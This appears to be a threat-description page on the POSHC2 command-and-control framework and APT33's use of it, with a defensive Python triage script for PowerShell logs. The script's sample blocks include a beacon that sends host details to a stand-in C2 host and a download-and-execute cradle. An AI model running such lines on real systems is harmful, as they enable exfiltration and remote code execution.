POSHC2 Description

POSHC2 is an open-source command-and-control (C2) and post-exploitation framework written for penetration testers and red teams, who use it to check whether the networks they administer or assess would withstand a real intrusion. Because the framework is free and its full source code is public, it has also attracted criminal and state-backed operators. They need to change very little, since pointing the implant at their own server and adjusting its configuration is enough to turn it into a working hacking tool. These weaponized deployments of the POSHC2 framework can be used to target companies and individuals alike.

Operations Targeting Major Industries

Among the threat actors taking advantage of the weaponized POSHC2 framework is APT33 (Advanced Persistent Threat 33), also tracked under the alias Elfin Team. The group is assessed to operate from Iran and has run campaigns against businesses and institutions in the United States, South Korea and Saudi Arabia. APT33 appears to favor POSHC2: the group used it in numerous campaigns in 2018, including operations against aviation and engineering targets. The variant the group deployed was configured with a kill date of July 29, 2018, after which the implant stops running. A kill date is a standard POSHC2 configuration option rather than a custom modification, but few threat actors bother to set one. Those who do limit how long a forgotten implant keeps beaconing, and so leave fewer traces for incident responders to find.

Operates as a Backdoor Trojan

In these deployments the POSHC2 framework has essentially been turned into a backdoor Trojan: once its implant runs on a target, it behaves like a conventional backdoor. It first collects information about the host (hardware, installed software, username, computer name and the process ID the implant is running under) and sends it to the operators' C&C (Command & Control) server. From then on the implant polls the server for tasks: it can execute remote commands, download and execute additional malware on the compromised machine and, because the implant is itself PowerShell-based, run arbitrary PowerShell commands directly. That dependence on PowerShell is also its weak point for defenders: PowerShell script block logging (Event ID 4104) and module logging record the implant's own code as it runs, which makes them the most direct telemetry for spotting it.
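The two behaviours described above, the host reconnaissance bundled with an HTTP channel and download-and-execute capability, and the hard-coded kill date from the previous section, leave a recognisable shape in PowerShell script block logs. The following triage script is an added example and is not code from POSHC2, from APT33 tooling or from the original page; the regexes are generic PowerShell idioms, not POSHC2 signatures, and the three script blocks are constructed samples standing in for Event ID 4104 payloads, with hostnames under the reserved `.invalid` domain.

```python
"""Heuristic triage of PowerShell script-block text for the implant behaviour
described above: bundled host reconnaissance (user, host name, PID, OS and
hardware inventory), an HTTP channel back to a controller, dynamic execution of
whatever the controller returns, and a hard-coded kill date.

Added example, not code from POSHC2 or from the page; the patterns are generic
PowerShell idioms, not POSHC2 signatures.
"""
import re
from typing import Dict, List

# Regexes per behaviour; a category counts as present if any pattern matches.
RECON = {
    "user": [r"\$env:USERNAME", r"\bwhoami\b", r"\[Environment\]::UserName"],
    "host": [r"\$env:COMPUTERNAME", r"\bhostname\b", r"\[Environment\]::MachineName"],
    "pid": [r"\$PID\b", r"GetCurrentProcess\(\)"],
    "inventory": [r"Win32_OperatingSystem", r"Win32_ComputerSystem",
                  r"Win32_Processor", r"Get-ComputerInfo"],
}
CHANNEL = {
    "http": [r"Net\.WebClient", r"Invoke-WebRequest", r"\biwr\b",
             r"Invoke-RestMethod", r"HttpWebRequest"],
    "dynamic_exec": [r"Invoke-Expression", r"\bIEX\b", r"\[ScriptBlock\]::Create"],
}
# Kill date: Get-Date compared (-gt/-lt/-ge/-le) against a literal yyyy-mm-dd
# or yyyy/mm/dd date in the same statement.
KILL_DATE = re.compile(
    r"Get-Date\)?[^;\n]*?-(?:gt|lt|ge|le)[^;\n]*?\d{4}[-/]\d{2}[-/]\d{2}",
    re.IGNORECASE,
)

# Constructed sample script blocks (not real captures) standing in for 4104 payloads.
SAMPLES = {
    "inventory": r"""
$os = Get-WmiObject Win32_OperatingSystem
$cs = Get-WmiObject Win32_ComputerSystem
"$env:COMPUTERNAME,$($os.Caption),$($cs.Model)" | Out-File C:\inventory\hosts.csv -Append
""",
    "implant": r"""
if ((Get-Date) -gt [datetime]'2018-07-29') { exit }
$info = "$env:USERNAME|$env:COMPUTERNAME|$PID|" + (Get-WmiObject Win32_OperatingSystem).Caption
$wc = New-Object Net.WebClient
$task = $wc.UploadString('https://c2.example.invalid/update', $info)
IEX $task
""",
    "cradle": r"""
IEX (New-Object Net.WebClient).DownloadString('https://intranet.example.invalid/bootstrap.ps1')
""",
}


def _hits(block: str, table: Dict[str, List[str]]) -> List[str]:
    """Names of the categories in `table` with at least one matching pattern."""
    return [name for name, patterns in table.items()
            if any(re.search(p, block, re.IGNORECASE) for p in patterns)]


def triage(block: str) -> Dict[str, object]:
    """Classify one script block. Recon alone is what an admin inventory script
    does; recon plus an outbound channel plus dynamic execution of the response
    is the backdoor shape described in the text, so only that combination is
    flagged. The kill date is reported separately as a supporting indicator."""
    recon = _hits(block, RECON)
    channel = _hits(block, CHANNEL)
    kill_date = KILL_DATE.search(block) is not None
    suspicious = (len(recon) >= 2
                  and "http" in channel
                  and "dynamic_exec" in channel)
    return {"recon": recon, "channel": channel,
            "kill_date": kill_date, "suspicious": suspicious}


def triage_all(samples: Dict[str, str] = SAMPLES) -> Dict[str, Dict[str, object]]:
    """Run triage over every sample and return the verdicts keyed by sample name."""
    return {name: triage(block) for name, block in samples.items()}


if __name__ == "__main__":
    for name, verdict in triage_all().items():
        print(f"{name:10} suspicious={verdict['suspicious']} "
              f"kill_date={verdict['kill_date']} recon={verdict['recon']} "
              f"channel={verdict['channel']}")
```

The third sample shows the rule's deliberate scope: a bare download cradle has the channel and the dynamic execution but none of the reconnaissance, so it is not flagged here and needs its own rule. None of this telemetry exists unless script block logging is enabled on the endpoints, which is the first control to verify when hunting for PowerShell-based implants.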

It is not uncommon for threat actors to hijack a legitimate tool and weaponize it, so the presence of an open-source red-team framework in an environment where no engagement is under way should be treated as an incident, not dismissed as a false positive. Businesses need to take their cybersecurity more seriously.